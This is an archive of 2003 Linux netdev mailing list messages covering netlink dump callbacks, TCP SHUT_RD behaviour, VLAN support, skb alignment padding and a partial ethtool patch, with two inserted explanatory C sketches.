ELM [version 2.5 PL6] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3847 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: kuznet@ms2.inr.ac.ru Precedence: bulk X-list: netdev Hello! > These routines 'get' the value of args[0] and then 'set' it to the resultant value. How is > this value set in the first place to the user provided value ? It is not. A zero value means that the dump starts from the very beginning. Setting it from a user value is supposed to happen on the first entry to ->dump(), but selective dumps are not implemented in most ->dump() methods. > missing something or is 'args' not intended for user specified arguments ? If so, how > should we access the arguments passed by the user ? The pointer to the nlmsg header is kept in cb->nlh.
So you can refer to it to get the user-supplied selector values, either to rewind the dump to the required point on the first entry or to select specific entries while scanning a table. For example, look at sch_api.c:tc_dump_tclass(): it scopes the dump to a netdevice (tcm_ifindex) and filters the answers to a specific qdisc (tcm_parent). It is also partial. More fine-grained selection is not required, but it is desirable; feel free to implement it. For example, an implementation of "ip route ls root 3ffe::/24", which translates to moving the root node for fib6_walk() to a more specific place and filtering out some nodes while walking, would be cool. Alexey From davem@redhat.com Tue Jul 8 19:38:54 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 08 Jul 2003 19:39:02 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h692cr2x008445 for ; Tue, 8 Jul 2003 19:38:54 -0700 Received: from localhost (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with ESMTP id TAA21827; Tue, 8 Jul 2003 19:30:08 -0700 Date: Tue, 08 Jul 2003 19:30:07 -0700 (PDT) Message-Id: <20030708.193007.26293028.davem@redhat.com> To: jmorris@intercode.com.au Cc: kuznet@ms2.inr.ac.ru, netdev@oss.sgi.com Subject: Re: [PATCH] Don't call request_module() under spinlock in xfrm_get_type() From: "David S. Miller" In-Reply-To: References: X-FalunGong: Information control. X-Mailer: Mew version 2.1 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3848 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev From: James Morris Date: Sun, 6 Jul 2003 22:42:40 +1000 (EST) This patch fixes a problem where request_module() was being called under the lock taken in xfrm_policy_get_afinfo(). Looks good, applied.
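[Archive note on the "Question about netlink" reply from Alexey earlier in this digest.] The resumable-dump convention he describes (args[0] starts at zero and records where to resume, while the user's selector is read from the request header) might be sketched in user space roughly as follows. This is not kernel code: `struct request`, `struct dump_cb`, `struct entry`, and `dump_table()` are hypothetical stand-ins for the nlmsg header, `struct netlink_callback`, a kernel table, and a `->dump()` method.

```c
#include <stddef.h>

/* Hypothetical stand-in for the user's request (what cb->nlh points at). */
struct request {
    int ifindex;                /* 0 means "no filter" */
};

/* Hypothetical stand-in for struct netlink_callback. */
struct dump_cb {
    const struct request *req;  /* plays the role of cb->nlh */
    long args[4];               /* plays the role of cb->args[] */
};

struct entry {
    int ifindex;
    int handle;
};

/*
 * Copy matching entries into out[], at most `room` per call.
 * args[0] holds the table index to resume from; zero means the dump
 * starts from the very beginning. Returns the number of entries
 * written; a return of 0 means the dump is complete.
 */
static size_t dump_table(struct dump_cb *cb,
                         const struct entry *table, size_t n,
                         struct entry *out, size_t room)
{
    size_t idx = (size_t)cb->args[0];
    size_t written = 0;

    for (; idx < n && written < room; idx++) {
        /* Apply the user's selector, taken from the request. */
        if (cb->req->ifindex && table[idx].ifindex != cb->req->ifindex)
            continue;
        out[written++] = table[idx];
    }
    cb->args[0] = (long)idx;    /* remember where to resume next time */
    return written;
}
```

A caller would zero `args[]`, point `req` at the parsed request, and call `dump_table()` repeatedly with a fresh output buffer until it returns 0.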
From mtk-lists@gmx.net Wed Jul 9 03:12:06 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 09 Jul 2003 03:12:43 -0700 (PDT) Received: from mx0.gmx.net (mx0.gmx.de [213.165.64.100]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h69ABP2x016225 for ; Wed, 9 Jul 2003 03:12:06 -0700 Received: (qmail 14055 invoked by uid 0); 9 Jul 2003 10:11:19 -0000 Date: Wed, 9 Jul 2003 12:11:19 +0200 (MEST) From: mtk-lists@gmx.net To: kuznet@ms2.inr.ac.ru, Andi Kleen Cc: netdev@oss.sgi.com MIME-Version: 1.0 Subject: Re: shutdown() and SHUT_RD on TCP sockets - broken? X-Priority: 3 (Normal) X-Authenticated-Sender: #0018454895@gmx.net X-Authenticated-IP: [212.18.21.202] Message-ID: <27451.1057745479@www2.gmx.net> X-Mailer: WWW-Mail 1.6 (Global Message Exchange) X-Flags: 0001 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit X-archive-position: 3849 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: mtk-lists@gmx.net Precedence: bulk X-list: netdev Hello Alexey and Andi, [Alexey] > > blocks. I see that this also occurs on FreeBSD 4.8, Tru64 5.1B, > > HP/UX 11 and Solaris 8. Have I misunderstood Stevens, > > Most likely, it is that rare case when Stevens forgot to check the > statement. Yes, it certainly doesn't correspond to any current implementation that I could find anyway. I should of course have added that (as you are probably well aware) SUSv3 is vague but does say: SHUT_RD Disables further receive operations. which suggests that we shouldn't be able to read any more. It seems to me that the only ways of satisfying that requirement are to either discard data (a la Stevens) or send an RST to the writing peer (more on that in a moment) so that it stops sending. > From viewpoint of TCP the behaviour described in Stevens' book > is highly unnatural. SHUT_RD on TCP does not make any sense.
A while back I had some communication with Andi Kleen on this point, and he suggested that the TCP could send an RST in this case, much as occurs if the reader close()s the socket. Is this not a starter? (Maybe not, for the reasons Andi outlined in his mail to this list -- quoted below.) > > described here. But, why do things happen in this way on Linux? > > Actually, you could check one more thing. What does happen after freebsd > 4.8 returns 0 on read()? Does it open window eventually? I'm not quite sure what you mean here. Can you elaborate on what type of experiment I should perform and what you expect I might see? [Andi] > > 1. If we perform a read() on the socket and there is no data, then 0 > > (EOF) is (immediately) returned. (This is what I expected.) > > > > 2. However, the peer can still write() to the socket, and afterwards we > > can read() that data from the socket, even though the reading half of the > > socket should be shut down. Instead of this behaviour, I expected the > > read() to continue to return 0 as in point 1. This is what we see for > > example in FreeBSD 4.8, Tru64 5.1B, and HP/UX 11. > > The problem is that it adds a new check to the input path. It's not clear > how the check can be done outside the fast path (one way would be to shrink > the window forcedly and drop the receiver into slow path, but that would be > a severe protocol violation if the shrunk window leaks out with some ACK). > I don't think it's a good idea to add a check for such an obscure situation > to the fast path. Andi, I already noted your idea about delivering an RST in this case. I assume the above is the practical reason that makes implementing this difficult? > > 3. (A side point.) Looking at Stevens UNPv1, p161, there is a statement > > that after a SHUT_RD, "any data for a TCP socket is acknowledged and then > > silently discarded". This implies to me that the sender could keep on > > writing to the socket and never block.
However, on Linux, if the peer > > keeps sending to a socket, then eventually (the channel is filled and) it > > blocks. I see that this also occurs on FreeBSD 4.8, Tru64 5.1B, HP/UX 11 > > That's because the data is not discarded so the window fills. Yes, I should perhaps have added that in the circumstances, blocking at this point is not surprising (to me). > > and Solaris 8. Have I misunderstood Stevens, or has something changed > > since the implementation he described (or was his statement wrong)? (In > > Probably Stevens was confused. There seems to be a consensus emerging ;-). Cheers, Michael From ak@suse.de Wed Jul 9 03:38:58 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 09 Jul 2003 03:39:35 -0700 (PDT) Received: from Cantor.suse.de (ns.suse.de [213.95.15.193]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h69AcH2x016756 for ; Wed, 9 Jul 2003 03:38:58 -0700 Received: from Hermes.suse.de (Hermes.suse.de [213.95.15.136]) by Cantor.suse.de (Postfix) with ESMTP id 782E814496; Wed, 9 Jul 2003 12:38:11 +0200 (MEST) Date: Wed, 9 Jul 2003 12:38:10 +0200 From: Andi Kleen To: mtk-lists@gmx.net Cc: kuznet@ms2.inr.ac.ru, netdev@oss.sgi.com Subject: Re: shutdown() and SHUT_RD on TCP sockets - broken? Message-Id: <20030709123810.2b94d753.ak@suse.de> In-Reply-To: <27451.1057745479@www2.gmx.net> References: <27451.1057745479@www2.gmx.net> X-Mailer: Sylpheed version 0.8.9 (GTK+ 1.2.10; i686-pc-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 3850 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: ak@suse.de Precedence: bulk X-list: netdev On Wed, 9 Jul 2003 12:11:19 +0200 (MEST) mtk-lists@gmx.net wrote: . > > > From viewpoint of TCP the behaviour described in Stevens' book > > is highly unnatural.
SHUT_RD on TCP does not make any sense. > > A while back I had some communication with Andi Kleen on this point, > and he suggested that the TCP could send an RST in this case, much Linux sends an RST when data arrives that the user cannot read anymore because the receiving socket is already closed. It would make sense to extend this behaviour to SHUT_RD. But there is no natural place to implement it outside the fast path, and it's so obscure that it is not worth slowing common cases down. -Andi
From andrius@andrius.org Wed Jul 9 08:20:01 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 09 Jul 2003 08:20:09 -0700 (PDT) Received: from hl.kalnieciai.lt (postfix@hl.kauneta.net [212.47.103.4]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h69FJw2x024539 for ; Wed, 9 Jul 2003 08:20:00 -0700 Received: by hl.kalnieciai.lt (Postfix, from userid 1430) id DC98E4F1BA; Wed, 9 Jul 2003 18:19:51 +0300 (GMT-3) Received: from localhost (localhost [127.0.0.1]) by hl.kalnieciai.lt (Postfix) with ESMTP id D7D684F156 for ; Wed, 9 Jul 2003 18:19:51 +0300 (GMT-3) Date: Wed, 9 Jul 2003 18:19:51 +0300 (GMT-3) From: Andrius Kasparavicius X-X-Sender: andrius@hl.kauneta.net To: netdev@oss.sgi.com Subject: network interface cards native vlans support in linux kernel? Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 3852 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: andrius@andrius.org Precedence: bulk X-list: netdev hello, as far as i know, currently there is no native vlan support in network device drivers. I mean, always need patching MTU.. add 4 bytes.. :-( is there any problems to include full vlans support? Andrius From garzik@gtf.org Wed Jul 9 08:25:59 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 09 Jul 2003 08:26:03 -0700 (PDT) Received: from havoc.gtf.org (host-64-213-145-173.atlantasolutions.com [64.213.145.173] (may be forged)) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h69FPx2x024877 for ; Wed, 9 Jul 2003 08:25:59 -0700 Received: by havoc.gtf.org (Postfix, from userid 500) id 98AF6663B; Wed, 9 Jul 2003 11:25:53 -0400 (EDT) Date: Wed, 9 Jul 2003 11:25:53 -0400 From: Jeff Garzik To: netdev@oss.sgi.com Subject: reasons for dev_alloc_skb +16?
Message-ID: <20030709152553.GB15293@gtf.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.3.28i X-archive-position: 3853 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@pobox.com Precedence: bulk X-list: netdev I knew this at one time, but have forgotten it :) What is the reason for adding 16 to the dev_alloc_skb length? (and skb_reserve of the same length) Jeff From garzik@gtf.org Wed Jul 9 08:28:20 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 09 Jul 2003 08:28:24 -0700 (PDT) Received: from havoc.gtf.org (host-64-213-145-173.atlantasolutions.com [64.213.145.173] (may be forged)) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h69FSK2x025199 for ; Wed, 9 Jul 2003 08:28:20 -0700 Received: by havoc.gtf.org (Postfix, from userid 500) id 0DBC6663B; Wed, 9 Jul 2003 11:28:15 -0400 (EDT) Date: Wed, 9 Jul 2003 11:28:15 -0400 From: Jeff Garzik To: Andrius Kasparavicius Cc: netdev@oss.sgi.com Subject: Re: network interface cards native vlans support in linux kernel? Message-ID: <20030709152814.GC15293@gtf.org> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.3.28i X-archive-position: 3854 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@pobox.com Precedence: bulk X-list: netdev On Wed, Jul 09, 2003 at 06:19:51PM +0300, Andrius Kasparavicius wrote: > hello, as far as i know, currently there is no native vlan support in > network device drivers. I mean, always need patching MTU.. add 4 bytes.. > :-( > > is there any problems to include full vlans support? Native VLAN support has been in the kernel for a while. A few drivers still need patching, and unfortunately the VLAN driver patches floating around all need cleaning up. 
Jeff From shmulik.hen@intel.com Wed Jul 9 08:34:02 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 09 Jul 2003 08:34:06 -0700 (PDT) Received: from hermes.iil.intel.com (hermes.iil.intel.com [192.198.152.99]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h69FY02x025568 for ; Wed, 9 Jul 2003 08:34:01 -0700 Received: from petasus.iil.intel.com (petasus.iil.intel.com [143.185.77.3]) by hermes.iil.intel.com (8.11.6p2/8.11.6/d: outer.mc,v 1.66 2003/05/22 21:17:36 rfjohns1 Exp $) with ESMTP id h69FSw316301 for ; Wed, 9 Jul 2003 15:28:58 GMT Received: from hasmsxvs01.iil.intel.com (hasmsxvs01.iil.intel.com [143.185.63.58]) by petasus.iil.intel.com (8.11.6p2/8.11.6/d: inner.mc,v 1.35 2003/05/22 21:18:01 rfjohns1 Exp $) with SMTP id h69Fart23592 for ; Wed, 9 Jul 2003 15:36:53 GMT Received: from hasmsx331.ger.corp.intel.com ([143.185.63.144]) by hasmsxvs01.iil.intel.com (NAVGW 2.5.2.11) with SMTP id M2003070918402809783 ; Wed, 09 Jul 2003 18:40:28 +0300 Received: from hasmsx403.ger.corp.intel.com ([143.185.63.109]) by hasmsx331.ger.corp.intel.com with Microsoft SMTPSVC(5.0.2195.5329); Wed, 9 Jul 2003 18:33:46 +0300 content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" X-MimeOLE: Produced By Microsoft Exchange V6.0.6375.0 Subject: RE: network interface cards native vlans support in linux kernel? Date: Wed, 9 Jul 2003 18:33:46 +0300 Message-ID: X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: network interface cards native vlans support in linux kernel? 
Thread-Index: AcNGLcwOizzRTsJXROSm7ZB2OZS1HwAAPh0Q From: "Hen, Shmulik" To: "Andrius Kasparavicius" , X-OriginalArrivalTime: 09 Jul 2003 15:33:46.0590 (UTC) FILETIME=[7CB12FE0:01C3462F] Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h69FY02x025568 X-archive-position: 3855 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: shmulik.hen@intel.com Precedence: bulk X-list: netdev Do you mean "native" as in hardware acceleration offloading? If that's the case, then the 8021q vlan module handshakes with the device driver to check for support and that's it. No need to do any settings on the device. In case there is no offloading support, the vlan module will take care of all stripping/inserting of the vlan tag into place. On the other hand, if the device cannot handle 1504 byte packets, it defines itself as "vlan challenged" and you can't use vlan on it at all. -- | Shmulik Hen | | Israel Design Center (Jerusalem) | | LAN Access Division | | Intel Communications Group, Intel corp. | > -----Original Message----- > From: Andrius Kasparavicius [mailto:andrius@andrius.org] > Sent: Wednesday, July 09, 2003 6:20 PM > To: netdev@oss.sgi.com > Subject: network interface cards native vlans support in linux kernel? > > > > hello, as far as i know, currently there is no native vlan support in > network device drivers. I mean, always need patching MTU.. > add 4 bytes.. > :-( > > is there any problems to include full vlans support?
> > > Andrius > > From shmulik.hen@intel.com Wed Jul 9 08:36:22 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 09 Jul 2003 08:36:54 -0700 (PDT) Received: from hermes.iil.intel.com (hermes.iil.intel.com [192.198.152.99]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h69FZe2x025888 for ; Wed, 9 Jul 2003 08:36:21 -0700 Received: from petasus.iil.intel.com (petasus.iil.intel.com [143.185.77.3]) by hermes.iil.intel.com (8.11.6p2/8.11.6/d: outer.mc,v 1.66 2003/05/22 21:17:36 rfjohns1 Exp $) with ESMTP id h69FUd316759 for ; Wed, 9 Jul 2003 15:30:39 GMT Received: from hasmsxvs01.iil.intel.com (hasmsxvs01.iil.intel.com [143.185.63.58]) by petasus.iil.intel.com (8.11.6p2/8.11.6/d: inner.mc,v 1.35 2003/05/22 21:18:01 rfjohns1 Exp $) with SMTP id h69FcYt23966 for ; Wed, 9 Jul 2003 15:38:34 GMT Received: from hasmsx331.ger.corp.intel.com ([143.185.63.144]) by hasmsxvs01.iil.intel.com (NAVGW 2.5.2.11) with SMTP id M2003070918421625837 ; Wed, 09 Jul 2003 18:42:16 +0300 Received: from hasmsx403.ger.corp.intel.com ([143.185.63.109]) by hasmsx331.ger.corp.intel.com with Microsoft SMTPSVC(5.0.2195.5329); Wed, 9 Jul 2003 18:35:33 +0300 content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" X-MimeOLE: Produced By Microsoft Exchange V6.0.6375.0 Subject: RE: reasons for dev_alloc_skb +16? Date: Wed, 9 Jul 2003 18:35:33 +0300 Message-ID: X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: reasons for dev_alloc_skb +16? 
Thread-Index: AcNGLm+Wg3SZN7pXSiWwFG8PyzBrSwAASVPg From: "Hen, Shmulik" To: "Jeff Garzik" , X-OriginalArrivalTime: 09 Jul 2003 15:35:33.0996 (UTC) FILETIME=[BCB60AC0:01C3462F] Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h69FZe2x025888 X-archive-position: 3856 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: shmulik.hen@intel.com Precedence: bulk X-list: netdev Could be for alignment issues. Or preparation for things like 8021q tagging. Shmulik. > -----Original Message----- > From: Jeff Garzik [mailto:jgarzik@pobox.com] > Sent: Wednesday, July 09, 2003 6:26 PM > To: netdev@oss.sgi.com > Subject: reasons for dev_alloc_skb +16? > > > I knew this at one time, but have forgotten it :) > > What is the reason for adding 16 to the dev_alloc_skb length? > (and skb_reserve of the same length) > > Jeff > > > From ak@suse.de Wed Jul 9 08:54:43 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 09 Jul 2003 08:55:17 -0700 (PDT) Received: from Cantor.suse.de (ns.suse.de [213.95.15.193]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h69Fs22x026297 for ; Wed, 9 Jul 2003 08:54:43 -0700 Received: from Hermes.suse.de (Hermes.suse.de [213.95.15.136]) by Cantor.suse.de (Postfix) with ESMTP id 2487414AA1; Wed, 9 Jul 2003 17:53:57 +0200 (MEST) Date: Wed, 9 Jul 2003 17:53:55 +0200 From: Andi Kleen To: Jeff Garzik Cc: netdev@oss.sgi.com Subject: Re: reasons for dev_alloc_skb +16? 
Message-Id: <20030709175355.422545b5.ak@suse.de> In-Reply-To: <20030709152553.GB15293@gtf.org> References: <20030709152553.GB15293@gtf.org> X-Mailer: Sylpheed version 0.8.9 (GTK+ 1.2.10; i686-pc-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 3857 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: ak@suse.de Precedence: bulk X-list: netdev On Wed, 9 Jul 2003 11:25:53 -0400 Jeff Garzik wrote: > I knew this at one time, but have forgotten it :) > > What is the reason for adding 16 to the dev_alloc_skb length? > (and skb_reserve of the same length) For the skb_reserve alignment to align the IP header. But it's not clear it is still a good idea because it leads to cache line misalignment of the beginning of the packet, forcing the card to do a costly Read-Modify-Write cycle. -Andi From garzik@gtf.org Wed Jul 9 09:07:03 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 09 Jul 2003 09:07:12 -0700 (PDT) Received: from havoc.gtf.org (host-64-213-145-173.atlantasolutions.com [64.213.145.173] (may be forged)) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h69G732x026756 for ; Wed, 9 Jul 2003 09:07:03 -0700 Received: by havoc.gtf.org (Postfix, from userid 500) id A98536641; Wed, 9 Jul 2003 12:06:57 -0400 (EDT) Date: Wed, 9 Jul 2003 12:06:57 -0400 From: Jeff Garzik To: Andi Kleen Cc: netdev@oss.sgi.com Subject: Re: reasons for dev_alloc_skb +16? 
Message-ID: <20030709160657.GD15293@gtf.org> References: <20030709152553.GB15293@gtf.org> <20030709175355.422545b5.ak@suse.de> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20030709175355.422545b5.ak@suse.de> User-Agent: Mutt/1.3.28i X-archive-position: 3858 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@pobox.com Precedence: bulk X-list: netdev On Wed, Jul 09, 2003 at 05:53:55PM +0200, Andi Kleen wrote: > On Wed, 9 Jul 2003 11:25:53 -0400 > Jeff Garzik wrote: > > > I knew this at one time, but have forgotten it :) > > > > What is the reason for adding 16 to the dev_alloc_skb length? > > (and skb_reserve of the same length) > > For the skb_reserve alignment to align the IP header. > > But it's not clear it is still a good idea because it leads to cache line > misalignment of the beginning of the packet, forcing the card to do a > costly Read-Modify-Write cycle. Exactly. Ben H is running into this, and pondering direct use of alloc_skb for precisely this reason. Jeff From ak@suse.de Wed Jul 9 09:13:52 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 09 Jul 2003 09:13:56 -0700 (PDT) Received: from Cantor.suse.de (ns.suse.de [213.95.15.193]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h69GDV2x027138 for ; Wed, 9 Jul 2003 09:13:52 -0700 Received: from Hermes.suse.de (Hermes.suse.de [213.95.15.136]) by Cantor.suse.de (Postfix) with ESMTP id 120D214738; Wed, 9 Jul 2003 18:13:26 +0200 (MEST) Date: Wed, 9 Jul 2003 18:13:24 +0200 From: Andi Kleen To: Jeff Garzik Cc: netdev@oss.sgi.com Subject: Re: reasons for dev_alloc_skb +16? 
Message-Id: <20030709181324.16ed0c1d.ak@suse.de> In-Reply-To: <20030709160657.GD15293@gtf.org> References: <20030709152553.GB15293@gtf.org> <20030709175355.422545b5.ak@suse.de> <20030709160657.GD15293@gtf.org> X-Mailer: Sylpheed version 0.8.9 (GTK+ 1.2.10; i686-pc-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 3859 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: ak@suse.de Precedence: bulk X-list: netdev On Wed, 9 Jul 2003 12:06:57 -0400 Jeff Garzik wrote: > On Wed, Jul 09, 2003 at 05:53:55PM +0200, Andi Kleen wrote: > > On Wed, 9 Jul 2003 11:25:53 -0400 > > Jeff Garzik wrote: > > > > > I knew this at one time, but have forgotten it :) > > > > > > What is the reason for adding 16 to the dev_alloc_skb length? > > > (and skb_reserve of the same length) > > > > For the skb_reserve alignment to align the IP header. > > > > But it's not clear it is still a good idea because it leads to cache line > > misalignment of the beginning of the packet, forcing the card to do a > > costly Read-Modify-Write cycle. > > Exactly. Ben H is running into this, and pondering direct use of > alloc_skb for precisely this reason. Problem with changing it is that the payload ends up misaligned. And user space usually aligns the buffer passed to recvmsg. This means csum_copy_to_user has to csum-copy unaligned->aligned, which will be likely very slow. Related problem is that the TCP/IP headers are unaligned, but if your CPU has fast enough misalignment handling it shouldn't be too bad. 
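The trade-off discussed in this thread can be sketched with some simple offset arithmetic. This is only an illustration under stated assumptions: a 14-byte Ethernet header, a buffer whose start is cache-line aligned, a 4-byte alignment requirement for the IP header, and a 64-byte cache line. The helper names below are hypothetical and are not kernel APIs.

```c
#include <assert.h>
#include <stdio.h>

#define ETH_HLEN     14  /* Ethernet header length in bytes */
#define IP_ALIGN_REQ 4   /* assumption: IP header wants 4-byte alignment */
#define CACHE_LINE   64  /* assumption: cache line size, for illustration only */

/* Offset of the IP header from the (aligned) buffer start when
 * `reserve` bytes of headroom precede the Ethernet header. */
static unsigned ip_header_offset(unsigned reserve)
{
	return reserve + ETH_HLEN;
}

/* Non-zero if the IP header lands on an IP_ALIGN_REQ boundary. */
static int ip_header_aligned(unsigned reserve)
{
	return ip_header_offset(reserve) % IP_ALIGN_REQ == 0;
}

/* Non-zero if the frame itself (what the card DMAs into) starts
 * on a cache line boundary. */
static int frame_start_cache_aligned(unsigned reserve)
{
	return reserve % CACHE_LINE == 0;
}

/* Print both properties for one choice of headroom. */
static void describe_layout(unsigned reserve)
{
	printf("reserve=%2u ip_offset=%2u ip_aligned=%d frame_cache_aligned=%d\n",
	       reserve, ip_header_offset(reserve),
	       ip_header_aligned(reserve),
	       frame_start_cache_aligned(reserve));
}

/* Self-check of the two cases the thread contrasts. */
static void check_layout_examples(void)
{
	/* 2 bytes of headroom: IP header aligned, frame start is not. */
	assert(ip_header_offset(2) == 16);
	assert(ip_header_aligned(2));
	assert(!frame_start_cache_aligned(2));

	/* No headroom: frame start aligned, IP header is not. */
	assert(!ip_header_aligned(0));
	assert(frame_start_cache_aligned(0));
}
```

Calling describe_layout(0) and describe_layout(2) from a small main() shows the conflict: with these assumptions, no single headroom value below one cache line satisfies both the card (cache-line-aligned frame start) and the stack (aligned IP header and payload).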
-Andi From willy@www.linux.org.uk Wed Jul 9 09:15:24 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 09 Jul 2003 09:15:36 -0700 (PDT) Received: from www.linux.org.uk (IDENT:7WD5g43L7JdHdPGfGnDhECHEiHPsevTw@parcelfarce.linux.theplanet.co.uk [195.92.249.252]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h69GFM2x027458 for ; Wed, 9 Jul 2003 09:15:23 -0700 Received: from willy by www.linux.org.uk with local (Exim 4.14) id 19aHbE-0005FB-6S; Wed, 09 Jul 2003 17:15:20 +0100 Date: Wed, 9 Jul 2003 17:15:20 +0100 From: Matthew Wilcox To: netdev@oss.sgi.com Cc: willy@debian.org, greearb@candelatech.com, "David S. Miller" , Arnaldo Carvalho de Melo , Jeff Garzik Subject: Re: [PATCH] netdev_ops Message-ID: <20030709161520.GW1939@parcelfarce.linux.theplanet.co.uk> References: <20030708163042.GL23597@parcelfarce.linux.theplanet.co.uk> <3F0B2D30.4020102@candelatech.com> <20030708212551.GL1939@parcelfarce.linux.theplanet.co.uk> <20030708.150835.78728697.davem@redhat.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20030708.150835.78728697.davem@redhat.com> User-Agent: Mutt/1.4.1i X-archive-position: 3860 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: willy@debian.org Precedence: bulk X-list: netdev Changes since yesterday's patch: - Make all methods take the struct net_device as suggested by Ben Greear. - Rename self_test_len() and get_stats_len() to *_count() to reflect that they return a count of elements, not a byte length. - Related bugfixes. - Remove the get_strings_len() method; we now infer the length from either self_test_count() or get_stats_count(). - memset() the drvinfo struct so it doesn't leak information from the kernel stack (existing bug in tg3). - Clamp regs.len in ethtool.c rather than in the driver. - Pass the stringset value to get_strings() rather than a pointer to the whole ethtool_gstrings struct. 
I have a question about the error return values in ethtool_get_strings(). Are -EOPNOTSUPP and -EINVAL the right ones to use in the case statement? Or should I perhaps be using -ENOSYS instead of EINVAL? I've noticed drepper tends to prefer this for unimplemented subops. Since this is an ioctl(), perhaps I should be using -ENOTTY instead ;-) Anyway, further comments welcomed. Index: include/linux/ethtool.h =================================================================== RCS file: /var/cvs/linux-2.5/include/linux/ethtool.h,v retrieving revision 1.5 diff -u -p -r1.5 ethtool.h --- include/linux/ethtool.h 14 Jun 2003 22:16:01 -0000 1.5 +++ include/linux/ethtool.h 8 Jul 2003 15:25:49 -0000 @@ -12,6 +12,7 @@ #ifndef _LINUX_ETHTOOL_H #define _LINUX_ETHTOOL_H +#include /* This should work for both 32 and 64 bit userland. */ struct ethtool_cmd { @@ -97,7 +98,7 @@ struct ethtool_coalesce { u32 rx_max_coalesced_frames; /* Same as above two parameters, except that these values - * apply while an IRQ is being services by the host. Not + * apply while an IRQ is being serviced by the host. Not * all cards support this feature and the values are ignored * in that case. */ @@ -119,7 +120,7 @@ struct ethtool_coalesce { u32 tx_max_coalesced_frames; /* Same as above two parameters, except that these values - * apply while an IRQ is being services by the host. Not + * apply while an IRQ is being serviced by the host. Not * all cards support this feature and the values are ignored * in that case. */ Index: include/linux/netdevice.h =================================================================== RCS file: /var/cvs/linux-2.5/include/linux/netdevice.h,v retrieving revision 1.14 diff -u -p 